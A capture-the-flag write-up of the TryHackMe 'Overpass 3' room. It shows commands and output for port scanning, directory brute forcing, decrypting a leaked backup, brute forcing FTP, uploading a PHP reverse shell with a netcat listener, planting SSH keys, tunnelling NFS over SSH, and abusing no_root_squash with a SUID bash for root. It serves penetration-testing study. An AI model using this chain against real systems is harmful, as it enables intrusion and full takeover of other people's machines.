Overpass 3 TryHackMe Writeup

9 minute read

overpass

Overpass3 is a medium rated room by NinjaJc01. A backup file was found on the webserver which contained few usernames and passwords which we used to login to the FTP server and found that the the FTP server was hosting the contents of the webserver and we also have a permission to write to that folder. A php script was uploaded which gave us a reverse shell as user apache. On the box NFS share was hosted with no_root_squash which was abused to get root shell on the box.

Port Scanning with Nmap

All Port Scanning

[email protected]:~/Documents/tryhackme/overpass-3$ nmap -p- --min-rate 10000 -v -oN nmap/all-ports 10.10.44.38
Nmap scan report for 10.10.44.38
Host is up (0.43s latency).
Not shown: 65532 filtered ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
# Nmap done at Wed Jan 13 20:34:47 2021 -- 1 IP address (1 host up) scanned in 74.60 seconds

Detail Scan

[email protected]:~/Documents/tryhackme/overpass-3$ PORTS=`cat nmap/all-ports | grep -i open | awk -F'/' '{print $1}' | sed -z 's/\n/,/g' | sed -z 's/,$//g'`
[email protected]:~/Documents/tryhackme/overpass-3$ nmap -p $PORTS -sC -sV -oN nmap/detail 10.10.44.38
Nmap scan report for 10.10.44.38
Host is up (0.39s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 de:5b:0e:b5:40:aa:43:4d:2a:83:31:14:20:77:9c:a1 (RSA)
|   256 f4:b5:a6:60:f4:d1:bf:e2:85:2e:2e:7e:5f:4c:ce:38 (ECDSA)
|_  256 29:e6:61:09:ed:8a:88:2b:55:74:f2:b7:33:ae:df:c8 (ED25519)
80/tcp open  http    Apache httpd 2.4.37 ((centos))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos)
|_http-title: Overpass Hosting
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 13 20:40:31 2021 -- 1 IP address (1 host up) scanned in 45.47 seconds

FTP - Trying anonymous Login

[email protected]:~/Documents/tryhackme/overpass-3$ ftp 10.10.1.43
Connected to 10.10.1.43.
220 (vsFTPd 3.0.3)
Name (10.10.1.43:reddevil): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp> 

Anonymous login was disabled.

HTTP Service on Port 80

1

Directory Bruteforcing using wfuzz

[email protected]:~/Documents/tryhackme/overpass-3$ wfuzz -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -c --hc 404 http://10.10.1.43/FUZZ
********************************************************
* Wfuzz 3.0.3 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.1.43/FUZZ
Total requests: 220547

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                                                        
===================================================================

000011247:   301        7 L      20 W     234 Ch      "backups"

We find a directory named backups.

Visiting /backups from browser

2 Directory listing is enabled on /backups and it contains a backup file called backup.zip.

Downloading and unzipping the file

3

There are two files on the backup.zip file.

[email protected]:~/Documents/tryhackme/overpass-3/backup$ ls -l
total 16
-rw-rw-r-- 1 reddevil reddevil 10366 Nov  9 03:03 CustomerDetails.xlsx.gpg
-rw------- 1 reddevil reddevil  3522 Nov  9 03:01 priv.key

Here we have a file which is encrpyted using gpg and a private key. Lets import the private key and decrypt the file.

Importing private key

4

Decrypting the file

[email protected]:~/Documents/tryhackme/overpass-3/backup$ gpg --decrypt CustomerDetails.xlsx.gpg > CustomerDetails.xlsx
gpg: encrypted with 2048-bit RSA key, ID 9E86A1C63FB96335, created 2020-11-08
      "Paradox <[email protected]>"

And the file is successfully decrpypted.

Converting xlsx file to PDF using libreoffice

[email protected]:~/Documents/tryhackme/overpass-3/backup$ libreoffice --headless --convert-to pdf CustomerDetails.xlsx 
convert ~/Documents/tryhackme/overpass-3/backup/CustomerDetails.xlsx -> ~/Documents/tryhackme/overpass-3/backup/CustomerDetails.pdf using filter : calc_pdf_Export

Content of CustomerDetails.pdf

5

We get some usernames and passwords. Since we do not have that much to look into HTTP, lets try to bruteforce on the SSH and FTP service using obtained credentials.

Bruteforcing SSH using hydra

6 SSH does not supports password based authentication which means we can only use SSH to login to the remote host using key based authentication.

Bruteforcing FTP using hydra

7 We get a hit on FTP server with user paradox. So, let’s login on the ftp server.

Enumerating FTP service

Logging in with user paradox

[email protected]:~/Documents/tryhackme/overpass-3$ ftp 10.10.1.43
Connected to 10.10.1.43.
220 (vsFTPd 3.0.3)
Name (10.10.1.43:reddevil): paradox
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

Listing directories and files

ftp> dir -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    3 48       48             94 Nov 17 23:54 .
drwxrwxrwx    3 48       48             94 Nov 17 23:54 ..
drwxr-xr-x    2 48       48             24 Nov 08 21:25 backups
-rw-r--r--    1 0        0           65591 Nov 17 20:42 hallway.jpg
-rw-r--r--    1 0        0            1770 Nov 17 20:42 index.html
-rw-r--r--    1 0        0             576 Nov 17 20:42 main.css
-rw-r--r--    1 0        0            2511 Nov 17 20:42 overpass.svg
226 Directory send OK.

Looking at the directory listing of the FTP server, it looks like the directory structure of the webserver. Lets check whether we have permission to upload a file on the FTP server or not and if we can upload the file, it will be reflected on the webserver and we can get code execution by uploading a PHP script.

Uploading a test file

ftp> put test
local: test remote: test
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 48       48             24 Nov 08 21:25 backups
-rw-r--r--    1 0        0           65591 Nov 17 20:42 hallway.jpg
-rw-r--r--    1 0        0            1770 Nov 17 20:42 index.html
-rw-r--r--    1 0        0             576 Nov 17 20:42 main.css
-rw-r--r--    1 0        0            2511 Nov 17 20:42 overpass.svg
-rw-r--r--    1 1001     1001            0 Jan 14 07:18 test
226 Directory send OK.

We have successfully uploaded a test file and the file is uploaded as a user with UID 1001.

Uploading PHP reverse shell

[email protected]:~/Documents/tryhackme/overpass-3$ locate php-reverse-shell.php
/usr/share/wordlists/Seclists/Web-Shells/laudanum-0.8/php/php-reverse-shell.php

Download from https://github.com/pentestmonkey/php-reverse-shell if you do not have it on your box.

ftp> put shell.php
local: shell.php remote: shell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5493 bytes sent in 0.00 secs (27.8645 MB/s)
ftp>

Listening on the local box

[email protected]:~/Documents/tryhackme/overpass-3$ nc -nvlp 8888
Listening on 0.0.0.0 8888

Hitting the shell.php on the webserver

8

We get a shell back as user apache.

Privilege Escalation

Listing users on the box with login shell as bash

bash-4.4$ cat /etc/passwd | grep -i bash
cat /etc/passwd | grep -i bash
root:x:0:0:root:/root:/bin/bash
james:x:1000:1000:James:/home/james:/bin/bash
paradox:x:1001:1001::/home/paradox:/bin/bash

Since paradox is a user on the box, lets try to change user from apache to paradox.

Shell as paradox

bash-4.4$ su paradox
su paradox
Password: S*************3

[[email protected] /]$ id
id
uid=1001(paradox) gid=1001(paradox) groups=1001(paradox)

And we get a shell as user paradox. This shell is hard to work with and we can only login on SSH using key based authentication. So lets generate a key pair and login on the box as user paradox.

Generating SSH key pairs on local box

9

Copying our public key to paradox’s authorized_keys

[[email protected] ~]$ echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDC3hlHyLwhFwfeMeYB8jee775OSPsxsU1v7p5jt5705NTjjPpR1UinjcrDYjPDFcyM/vcRJ7teaFWH67FlMvyPo5aW2YH6425LtiG0f0w3sM2u+PIjLcYiKgL4lnp4+SNW7S1svBBhPQbMsW3FkD8R2mWv+2gDEzNzskxLO8jLRNUlkXZjS6fuVzZ3isQz4oGPB5ds6suFjgyP3bCC2IIOw2ZIlv4LvgUM78e57KiLutp6z9dSHmFnM35qgvJGsgE+R1WLjVPWEp4GOumFOpg2Sq/X8cHA0Zf07sG0fhS5TMjczH4+dOflMlSZQJyzBiZqI6uGAj+YiWGsmukqXFAlBzVcmQtreB/MCkYXNMqQhjtqevMU4UynA9MGe0nYzfbLpueUs9nQdKRs5BqTHNcLA3nWDCpz8oJSh6GiUYzKb8kFjmI3g+u7O9tsxFmWiU1RrUpIEklN0Gi0nZOrFDaOggxXmaXz/GuF3gT/9ZwtuGfQcV873zWLh6W1b+qDz5E= [email protected]' > .ssh/authorized_keys
<6W1b+qDz5E= [email protected]' > .ssh/authorized_keys

Logging as user paradox using SSH

[email protected]:~/Documents/tryhackme/overpass-3$ chmod 600 paradox
[email protected]:~/Documents/tryhackme/overpass-3$ ssh -i paradox [email protected]
The authenticity of host '10.10.1.43 (10.10.1.43)' can't be established.
ECDSA key fingerprint is SHA256:Zc/Zqa7e8cZI2SP2BSwt5iLz5wD3XTxIz2SLZMjoJmE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.1.43' (ECDSA) to the list of known hosts.
Last login: Thu Jan 14 08:12:22 2021
[[email protected] ~]$ id
uid=1001(paradox) gid=1001(paradox) groups=1001(paradox)

Running linpeas.sh on the box

10

We can see a NFS share is hosted by the server, i.e. home directory of user james and no_root_squash is enabled. It means that if the share is mounted on our local device and if we create a file using root user, the file permissions also remain same for the remote server too.

Listing mount from our local box

[email protected]:~/Documents/tryhackme/overpass-3$ showmount -e 10.10.1.43
clnt_create: RPC: Unable to receive

If we check the Nmap result from the full port scan, the port listening for NFS, ie 2049 was closed.

Listing listening Ports on the Server

[[email protected] ~]$ ss -ltn
State            Recv-Q           Send-Q                      Local Address:Port                        Peer Address:Port           
LISTEN           0                128                               0.0.0.0:22                               0.0.0.0:*              
LISTEN           0                64                                0.0.0.0:40473                            0.0.0.0:*              
LISTEN           0                64                                0.0.0.0:2049                             0.0.0.0:*              
LISTEN           0                128                               0.0.0.0:49701                            0.0.0.0:*              
LISTEN           0                128                               0.0.0.0:111                              0.0.0.0:*              
LISTEN           0                128                               0.0.0.0:20048                            0.0.0.0:*              
LISTEN           0                128                                  [::]:22                                  [::]:*              
LISTEN           0                64                                   [::]:38011                               [::]:*              
LISTEN           0                64                                   [::]:2049                                [::]:*              
LISTEN           0                128                                  [::]:111                                 [::]:*              
LISTEN           0                128                                  [::]:20048                               [::]:*              
LISTEN           0                128                                     *:80                                     *:*              
LISTEN           0                128                                  [::]:34517                               [::]:*              
LISTEN           0                32                                      *:21 

But on the server, port 2049 is open on all interfaces (0.0.0.0) but we are not able to connect to it which means it is behind some firewall. So, lets use SSH for port tunneling.

We have to mount the drive to our local device because it requires permission of a root user.

Port Tunnelling using SSH

[email protected]:~/Documents/tryhackme/overpass-3$ ssh -N -L 2049:127.0.0.1:2049 -i paradox [email protected]

Listing the Shares using showmount

[email protected]:~/Documents/tryhackme/overpass-3$ showmount -e localhost
clnt_create: RPC: Timed out

It hangs for some time and ultimately gives us a timeout. Lets analyze what is happening on the wireshark.

Capturing Network traffic using wireshark

11 Showmount first tries to connect to port 111. So, lets using SSH to create a tunnel to this port.

Port Tunneling using SSH

[email protected]:~/Documents/tryhackme/overpass-3$ sudo ssh -N -L 111:127.0.0.1:111 -i paradox [email protected]

We need root permission for tunneling this port using SSH as the port 111 is a privileged port.

Trying again to list the Shares

[email protected]:~/Documents/tryhackme/overpass-3$ showmount -e localhost
clnt_create: RPC: Timed out

We also get a timeout this time too.

Checking traffic on wireshark

12 This time our localbox was not able to connect to port 20048. So lets use SSH to create a tunnel to this port too.

Port tunneling using SSH

[email protected]:~/Documents/tryhackme/overpass-3$ ssh -N -L 20048:127.0.0.1:20048 -i paradox [email protected]

Listing the NFS Shares

[email protected]:~/Documents/tryhackme/overpass-3$ showmount -e localhost
Export list for localhost:
/home/james *

Finally we are able to list the NFS Shares on our local box. Lets mount the remote NFS share on our local box.

Mounting NFS Share

[email protected]:~/Documents/tryhackme/overpass-3$ mkdir mnt
[email protected]:~/Documents/tryhackme/overpass-3$ sudo mount -t nfs -o nolock localhost:/home/james mnt
[email protected]:~/Documents/tryhackme/overpass-3$ cd mnt
[email protected]:~/Documents/tryhackme/overpass-3/mnt$ ls -la
total 20
drwx------ 3 reddevil reddevil  112 Nov 18 03:00 .
drwxrwxr-x 5 reddevil reddevil 4096 Jan 14 14:29 ..
lrwxrwxrwx 1 root     root        9 Nov  9 03:30 .bash_history -> /dev/null
-rw-r--r-- 1 reddevil reddevil   18 Nov  8  2019 .bash_logout
-rw-r--r-- 1 reddevil reddevil  141 Nov  8  2019 .bash_profile
-rw-r--r-- 1 reddevil reddevil  312 Nov  8  2019 .bashrc
drwx------ 2 reddevil reddevil   61 Nov  8 08:05 .ssh
-rw------- 1 reddevil reddevil   38 Nov 18 03:00 user.flag

Lets write our public key to authorized_keys of user james and login on the box as user james.

Writing authorized_keys for james

[email protected]:~/Documents/tryhackme/overpass-3/mnt$ cp ../paradox.pub .ssh/authorized_keys

Logging as user james

[email protected]:~/Documents/tryhackme/overpass-3$ ssh -i paradox [email protected]
Last login: Wed Nov 18 18:26:00 2020 from 192.168.170.145
[[email protected] ~]$ id
uid=1000(james) gid=1000(james) groups=1000(james)

Since the file permission are saved, lets copy a /bin/bash binary to user james’ home folder and change the permissions from our local box.

Getting as root shell

On Remote box

[[email protected] ~]$ cp /bin/bash bash

On local box

[email protected]:~/Documents/tryhackme/overpass-3/mnt$ ls -la bash
-rwxr-xr-x 1 reddevil reddevil 1219248 Jan 14 14:36 bash
[email protected]:~/Documents/tryhackme/overpass-3/mnt$ sudo chown root:root bash
[email protected]:~/Documents/tryhackme/overpass-3/mnt$ sudo chmod 4777 bash
[email protected]:~/Documents/tryhackme/overpass-3/mnt$

I have changed the owner of the file bash to root and also set the SUID bit on that file.

Executing the binary on remote box

[[email protected] ~]$ ls -la bash
-rwsrwxrwx 1 root root 1219248 Jan 14 08:51 bash

[[email protected] ~]$ ./bash -p
bash-4.4# id
uid=1000(james) gid=1000(james) euid=0(root) groups=1000(james)

We have a shell as root.

Reading flags

13